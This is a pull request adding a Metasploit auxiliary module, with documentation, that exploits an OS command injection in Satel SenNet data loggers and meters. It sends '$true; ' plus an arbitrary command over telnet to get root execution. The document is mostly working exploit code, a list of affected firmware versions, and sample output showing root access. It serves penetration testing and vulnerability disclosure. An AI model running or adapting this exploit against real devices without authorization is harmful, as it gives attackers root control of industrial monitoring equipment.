### PR TITLE
Add Satel SenNet Command Exec Module

### DIFF
--- a/documentation/modules/auxiliary/scanner/telnet/satel_cmd_exec.md
+++ b/documentation/modules/auxiliary/scanner/telnet/satel_cmd_exec.md
@@ -1,4 +1,9 @@
-This module exploits an OS Command Injection vulnerability in Satel SenNet Data Loggers to perform arbitrary command execution as 'root'.
+This module exploits an OS Command Injection vulnerability in Satel SenNet Data Logger and Electricity Meters to perform arbitrary command execution as 'root'.
+
+The following versions of SenNet Data Logger and Electricity Meters, monitoring platforms, are affected:
+1. SenNet Optimal DataLogger V5.37c-1.43c and prior,
+2. SenNet Solar Datalogger V5.03-1.56a and prior, and
+3. SenNet Multitask Meter V5.21a-1.18b and prior.
 
 ## Verification Steps
 
@@ -16,7 +21,7 @@ msf auxiliary(satel_cmd_exec) > run
 
 [*] 1.3.3.7:5000   - Sending command now - id;
 [+] 1.3.3.7:5000   - uid=0(root) gid=0(root)
-[+] 1.3.3.7:5000   - File saved in: /root/.msf4/loot/20000000000004_1.3.3.7_cmdexeclog_528409.txt
+[+] 1.3.3.7:5000   - File saved in: /root/.msf4/loot/20000000000003_1.3.3.7_cmdexeclog_12345.txt
 [*] Scanned 1 of 1 hosts (100% complete)
 [*] Auxiliary module execution completed
 

--- a/documentation/modules/auxiliary/scanner/telnet/satel_cmd_exec.md
+++ b/documentation/modules/auxiliary/scanner/telnet/satel_cmd_exec.md
@@ -1,0 +1,23 @@
+This module exploits an OS Command Injection vulnerability in Satel SenNet Data Loggers to perform arbitrary command execution as 'root'.
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/telnet/satel_cmd_exec```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```set RPORT [PORT]```
+4. Do: ```run```
+
+## Sample Output
+
+  ```
+msf > use auxiliary/scanner/telnet/satel_cmd_exec
+msf auxiliary(satel_cmd_exec) > set rhosts 1.3.3.7
+msf auxiliary(satel_cmd_exec) > run
+
+[*] 1.3.3.7:5000   - Sending command now - id;
+[+] 1.3.3.7:5000   - uid=0(root) gid=0(root)
+[+] 1.3.3.7:5000   - File saved in: /root/.msf4/loot/20000000000004_1.3.3.7_cmdexeclog_528409.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+
+  ```

--- a/modules/auxiliary/scanner/telnet/satel_cmd_exec.rb
+++ b/modules/auxiliary/scanner/telnet/satel_cmd_exec.rb
@@ -1,0 +1,86 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::Telnet
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'Satel SenNet Data Logger Privileged Shell Arbitrary Command Execution Vulnerability',
+      'Description' => %q{
+        This module exploits an OS Command Injection vulnerability in Satel SenNet Data Loggers to perform arbitrary command execution as 'root'.
+      },
+      'Author' =>
+        [
+          'Karn Ganeshen <KarnGaneshen[at]gmail.com>'
+        ],
+      'DisclosureDate' => 'Apr 07, 2017',
+      'License' => MSF_LICENSE,
+      'DefaultOptions' => { 'VERBOSE' => true })
+      )
+
+    register_options(
+      [
+        Opt::RPORT(5000),
+        OptInt.new('TIMEOUT', [true, 'Timeout for the Telnet probe', 30]),
+        OptString.new('CMD', [true, 'Command(s) to run', 'id; pwd;'])
+      ], self.class
+    )
+
+    deregister_options('USERNAME', 'PASSWORD')
+  end
+
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    login_data = {
+      last_attempted_at: Time.now,
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::SUCCESSFUL,
+      proof: opts[:proof]
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
+  def run_host(ip)
+    to = (datastore['TIMEOUT'].zero?) ? 30 : datastore['TIMEOUT']
+    begin
+      ::Timeout.timeout(to) do
+        command = datastore['CMD']
+        inject = '$true; ' + "#{command}"
+        res = connect
+
+        print_status("Sending command now - #{command}")
+
+        sock.puts(inject)
+        data = sock.get_once(-1, 5)
+
+        print_good("#{data}")
+
+        loot_name = 'cmd-exec-log'
+        loot_type = 'text/plain'
+        loot_desc = 'Satel SenNet CMD Exec Dump'
+        p = store_loot(loot_name, loot_type, datastore['RHOST'], data, loot_desc)
+        print_good("File saved in: #{p}")
+      end
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
+      print_error("#{rhost}:#{rport} - HTTP Connection Failed...")
+      return false
+    ensure
+      disconnect
+    end
+  end
+end


### PR DESCRIPTION
This module exploits an OS Command Injection vulnerability in Satel SenNet Data Loggers to perform arbitrary command execution as 'root'.

## Verification Steps

1. Do: ```use auxiliary/scanner/telnet/satel_cmd_exec```
2. Do: ```set RHOSTS [IP]```
3. Do: ```set RPORT [PORT]```
4. Do: ```run```

## Checks run

  ```
rubocop
msftidy
  ```

## NOTE
Currently the module executes a single command. It should be able to chain and execute multiple commands - it does so when tested manually. I am using `socks.puts(cmd)` to send the commands. If this is not the correct way, or if there is a better way to do this, please let me know.